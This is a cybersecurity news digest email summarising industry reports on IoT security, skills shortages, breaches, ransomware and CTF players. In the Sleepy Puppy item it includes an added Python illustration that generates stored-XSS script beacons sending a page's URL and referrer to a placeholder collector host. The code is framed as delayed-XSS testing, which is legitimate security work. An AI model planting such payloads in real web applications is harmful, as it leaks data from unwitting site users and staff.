[From the desk of Paul Davis – his opinions and no-one else’s]
Apart from the reporter’s opinions.
So onto the news:
Why Internet of Things will change cybersecurity forever: Gartner
Over 20 percent of enterprises will have digital security services devoted to protecting business initiatives that use devices and services in the Internet of Things (IoT) by year-end 2017, according to Gartner, Inc.
Gartner defines digital security as the risk-driven expansion and extension of current security risk practices that protect digital assets of all forms in the digital business and ensure that relationships among those assets can be trusted.
“Governance, management and operations of security functions will need to be significant to accommodate expanded responsibilities, similar to the ways that bring your own device (BYOD), mobile and cloud computing delivery have required changes – but on a much larger scale and in greater breadth,” said Ramamoorthy. “IT will learn much from its operational technology (OT) predecessors in handling this new environment.”
Link: http://paulgdavis.us3.list-manage1.com/track/click?u=45bf3caf699abf9904ddc00e3&id=8da5da23dc&e=20056c7556
The myth of the cybersecurity skills shortage
Everyone seems to think that there’s a lack of qualified security professionals, and that the reason is that there aren’t enough people entering the field with the required skills.
There is a fallacy behind that thinking, though.
People think that security is a stand-alone discipline, but it is actually a discipline within the computer field.
Treating it otherwise is a mistake.
Security positions are not entry-level positions, and if you treat them as such, you will have terrible security.
The best security practitioners have experience in the technology and processes that they are supposed to secure.
If you are not an experienced developer, you do not have the standing to tell people how to secure the code they write.
If you have no experience as a system administrator, you cannot maintain the security of a system.
If you have no experience as an administrator, you cannot secure a database.
If you have no experience in designing a network, you cannot competently design a secure network.
Security professionals are developed over time, just as happens with experts in every profession, including all of the other disciplines within the computer profession.
Link: http://paulgdavis.us3.list-manage.com/track/click?u=45bf3caf699abf9904ddc00e3&id=aebf72d1de&e=20056c7556
Netflix Sleepy Puppy XSS flaw detection tool goes open source
On Monday, Netflix team members Scott Behrens and Patrick Kelley revealed the open source release of the firm’s cross-site scripting (XSS) payload management framework.
Dubbed Sleepy Puppy, the tool, Netflix says, goes beyond testing only the main application for XSS flaws and also covers secondary applications that may become the conduit through which an XSS flaw is exploited.
In other words, Sleepy Puppy watches for payloads that are injected into a primary application without executing there, then propagate to a secondary application (an admin console, a log viewer, a reporting tool) where they finally run.
The Netflix team call this “delayed” XSS testing.
Sleepy Puppy is designed to simplify the process of capturing, managing, and tracking XSS propagation over periods of time and testing sessions.
The configurable tool leverages an assessment model to categorize XSS strings and injections and allows users to subscribe to email notifications when delayed cross-site scripting events are triggered.
Sleepy Puppy comes with a number of payloads, as well as an API for users who wish to develop plugins to support scanners such as Burp or ZAP.
Sleepy Puppy, available from the Netflix Open Source website, comes with built-in payloads, PuppyScripts and a default assessment scheme.
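To make the “delayed” XSS idea concrete, here is a small added illustration (not Sleepy Puppy’s own code, and not Netflix’s API): each payload carries a unique token, the payload is an image beacon that reports where it actually executed, and a collector correlates that hit back to the injection point. The collector URL, the class and field names, and the shop/moderation hosts in the scenario are all assumptions for the example; Sleepy Puppy’s real payloads and PuppyScripts differ.

```python
"""Added illustration of "delayed" (stored / blind) XSS tracking: every payload
carries a unique token, a beacon reports where it actually executed, and the
collector correlates that back to the original injection point.  Hypothetical
code in the spirit of the tool described above, not Sleepy Puppy's own."""
import secrets
import time
from dataclasses import dataclass
from urllib.parse import parse_qs, quote, urlparse

# Assumed collector endpoint; in a real assessment this is a host you control.
CALLBACK_URL = "https://collector.example.test/c"


@dataclass
class Injection:
    token: str
    target: str      # URL of the primary application the payload was sent to
    parameter: str   # request parameter the payload was placed in
    injected_at: float


@dataclass
class Execution:
    token: str
    fired_from: str  # location.href of the page the payload ran in
    referrer: str
    fired_at: float


class PayloadTracker:
    def __init__(self, callback_url: str = CALLBACK_URL):
        self.callback_url = callback_url
        self.injections: dict[str, Injection] = {}
        self.executions: list[Execution] = []

    def payload_for(self, target: str, parameter: str) -> tuple[str, str]:
        """Mint a tagged payload for one injection point and remember it."""
        token = secrets.token_hex(8)
        self.injections[token] = Injection(token, target, parameter, time.time())
        # Image beacon: a plain GET that works from any page that renders the
        # stored payload, even a back-office app on a different host.
        js = (
            "var i=new Image();"
            f"i.src='{self.callback_url}?t={token}'"
            "+'&l='+encodeURIComponent(location.href)"
            "+'&r='+encodeURIComponent(document.referrer);"
        )
        return f"<script>{js}</script>", token

    def record_callback(self, beacon_url: str):
        """Correlate a beacon hit (the URL the victim's browser requested)."""
        qs = parse_qs(urlparse(beacon_url).query)
        token = qs.get("t", [None])[0]
        if token not in self.injections:
            return None  # not one of our tokens; ignore noise and replays
        ex = Execution(token, qs.get("l", [""])[0], qs.get("r", [""])[0], time.time())
        self.executions.append(ex)
        return ex

    def findings(self) -> list[tuple[Injection, Execution, bool]]:
        """Each execution paired with its injection; the flag is True when it
        is delayed, i.e. it fired on a different host than it was injected into."""
        out = []
        for ex in self.executions:
            inj = self.injections[ex.token]
            delayed = urlparse(ex.fired_from).netloc != urlparse(inj.target).netloc
            out.append((inj, ex, delayed))
        return out


def demo():
    """Constructed scenario: payload stored via a public review form, never
    rendered there, but executed later in an internal moderation console."""
    tracker = PayloadTracker()
    payload, token = tracker.payload_for("https://shop.example.test/review", "comment")
    assert token in payload
    # Hours later the beacon arrives from a different application entirely.
    hit = (f"{CALLBACK_URL}?t={token}"
           f"&l={quote('https://moderation.internal.example/queue?id=42', safe='')}"
           f"&r={quote('https://moderation.internal.example/', safe='')}")
    tracker.record_callback(hit)
    tracker.record_callback(f"{CALLBACK_URL}?t=deadbeef")  # unknown token, dropped
    return tracker.findings()


if __name__ == "__main__":
    for inj, ex, delayed in demo():
        print(f"{inj.parameter}@{inj.target} fired at {ex.fired_from} delayed={delayed}")
```

The point of the per-injection token is that the execution can arrive days later from a host the tester never touched; without the token there is no way to say which form field on which application carried the payload there. Dropping unknown tokens also keeps scanner noise and replayed beacons out of the findings.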
Link: http://paulgdavis.us3.list-manage.com/track/click?u=45bf3caf699abf9904ddc00e3&id=6f10984e45&e=20056c7556
Extent of data breaches in pharmaceutical sector revealed
The Crown Records Management Survey revealed:
– 60% of IT decision makers in the pharmaceutical sector said their company had lost important data
– 12% had done so between seven and nine times, and 8% between 13 and 15 times
– 24% reported their company had suffered a hack
Ann Sellar, Business Development Manager at Crown Records Management, a global information management expert, said, “These survey results should be a wake-up call for UK businesses, and especially those in the pharmaceutical sector, because the importance of protecting customer data is higher than ever.
Not only because of potential fines for data breaches (which will soon increase when the EU General Data Protection Regulation is ratified) but also because of growing public awareness.”
Link: http://paulgdavis.us3.list-manage.com/track/click?u=45bf3caf699abf9904ddc00e3&id=582b8b81e4&e=20056c7556
When a Security Policy Creates More Problems Than It Solves
Security policies can create a dangerous false sense of security and can end up being used against you in a court of law.
Looking at this from the plaintiff’s perspective in the case of a data breach, it won’t take much for lawyers, forensics analysts and expert witnesses to show that due care was indeed not taking place in the enforcement of policies and the ongoing management of security.
That’s already happened in some bigger cases, and it’s certainly playing out in others right now.
Now that it’s confirmed that the Federal Trade Commission (FTC) has the authority to go after companies due to lax security, this issue could get really big really fast.
Anyone can document anything they want in a policy involving things such as passwords, full-disk encryption for laptops, bring-your-own-device (BYOD) rules, etc.
But it means nothing when these policies are not enforced, which is often the case.
Rather than it being the oft-cited “glitch” causing problems, the breaches we hear about are a breakdown in information security management somewhere along the way.
We know that talk is cheap in many aspects of business, but I can think of no place where it’s more evident than in information security.
We’re seeing this very issue play out in the courts today.
It’s time to start unchecking those boxes and do what’s right before a third-party expert or analyst calls it out and you’re forced to act.
Link: http://paulgdavis.us3.list-manage.com/track/click?u=45bf3caf699abf9904ddc00e3&id=684f8550b8&e=20056c7556
Ransomware jumps 127%, IoT malware on rise too: McAfee
The security firm attributes the increase to fast-growing new families such as CTB-Locker, CryptoWall, and others.
In Q2, the total number of mobile malware samples grew 17 percent.
But mobile malware infection rates declined about 1 percent per region this quarter.
The trend of decreasing botnet-generated spam volume continued through Q2, the report said, as the Kelihos botnet remained inactive.
Slenfbot again claims the top rank, followed closely by Gamut, with Cutwail rounding out the top three.
Link: http://paulgdavis.us3.list-manage.com/track/click?u=45bf3caf699abf9904ddc00e3&id=6be8afbf65&e=20056c7556
MEPs clash over renewed calls for a European Intelligence Agency
The failed terrorist attack on the Amsterdam-Paris Thalys has prompted the outspoken group leader of the Alliance of Liberals and Democrats for Europe, Guy Verhofstadt, to reiterate his demand for a European Intelligence Agency.
However, European officials urged caution against overreaction.
Commission transport spokesman, Jakub Adamowicz, highlighted the costs and logistical problems associated with tighter security.
He suggested a “hyperactive” response may prove “counterproductive.”
Eurosceptic MEPs have also rejected demands for a European Intelligence Agency, arguing security services are the prerogative of member states.
Meanwhile Charles Michel, the Belgian Prime Minister, has gone further, urging policymakers to consider reintroducing identity and luggage inspections across international train routes.
Link: http://paulgdavis.us3.list-manage.com/track/click?u=45bf3caf699abf9904ddc00e3&id=0d3183087e&e=20056c7556
CTF players versus professional penetration testers
According to ISACA’s State of Cybersecurity: Implications for 2015 report, 72.33% of respondents said that the biggest skill gap in today’s security professionals is the ability to understand the business.
Another interesting fact from the survey is that the majority of respondents found that less than 25% of applicants were qualified for a cybersecurity position.
These numbers highlight a very serious gap between people looking for an infosec job and modern businesses.
Actually, a similar gap exists between CTF contests and professional penetration testing.
Even at famous CTF events, usually organized in parallel with various conferences, many CTF players are students or have just started their first infosec job.
Sadly, quite often prominent teams of young but talented players fail to participate in a CTF due to the high price of travel and the events being held in venues they simply cannot afford.
A CTF player can also bring some useful insights to your team and a vision from a different angle that others will probably not have.
Link: http://paulgdavis.us3.list-manage.com/track/click?u=45bf3caf699abf9904ddc00e3&id=f2f229e1a0&e=20056c7556
Have you ever considered a people-centric security strategy?
PCS is a strategic approach to information security that emphasises individual accountability and trust, and de-emphasises restrictive, preventive security controls.
“PCS represents a major departure from conventional security strategies, but reflects the reality that current security approaches are increasingly difficult to manage in a digital environment,” said Tom Scholtz, vice president and Gartner Fellow.
Some of you may have tried implementing a people-centric security (PCS) strategy and faced opposition from some business leaders and security and risk professionals.
But how would they react now if they knew that by 2019, digital business adoption will compel 30 percent of organisations to implement PCS strategies, up from less than 5 percent in 2014?
The trust-based security strategy empowered decision makers within the enterprise’s subsidiaries to make their own risk-based decisions.
In essence, it was up to the subsidiaries to make most security control decisions, with appropriate support and guidance from the group’s IT team.
This enabled a more collaborative approach that is much more aligned with the organisation’s culture to minimise risk and maximise the use of a wide variety of IT services.
This was in stark contrast to the previous policy-based dictatorial approach.
Overall, security and risk leaders must carefully consider whether PCS is appropriate for their organization and ensure that the appropriate enterprise environment exists for PCS.
PCS is not a tool for initiating cultural change.
Link: http://paulgdavis.us3.list-manage.com/track/click?u=45bf3caf699abf9904ddc00e3&id=802175cc9b&e=20056c7556
Getting Out: Data Exfiltration Gets Sophisticated
Attackers don’t have any trouble breaking into corporate networks.
According to a new McAfee Labs and Intel Security report, cybercrime has in fact become an industry unto itself, with suppliers, markets, service providers and even trading systems.
What’s more, companies often lag behind when it comes to applying security updates and ensuring that users follow password security protocols.
Also of interest is the increasing criminal focus on mobile and IoT-connected devices, which are prime targets for compromise not as end goals, but a way to access higher-value data assets.
Attackers have mastered the art of getting in.
Rather than fight the losing battle of open doors, enterprises are better served looking for ways to keep data at home and malicious actors trapped on the wrong side of the wall.
Link: http://paulgdavis.us3.list-manage1.com/track/click?u=45bf3caf699abf9904ddc00e3&id=6d26a16e89&e=20056c7556
============================================================
Feedback, questions? Our mailing address is: dailynews@paulgdavis.com (mailto:dailynews@paulgdavis.com)
If someone forwarded this email to you and you want to be added in,
please click this: Subscribe to this list (http://paulgdavis.us3.list-manage.com/subscribe?u=45bf3caf699abf9904ddc00e3&id=e09452545a)
Unsubscribe from this list (http://paulgdavis.us3.list-manage1.com/unsubscribe?u=45bf3caf699abf9904ddc00e3&id=e09452545a&e=20056c7556&c=e1f0458236)
Update subscription preferences (http://paulgdavis.us3.list-manage.com/profile?u=45bf3caf699abf9904ddc00e3&id=e09452545a&e=20056c7556)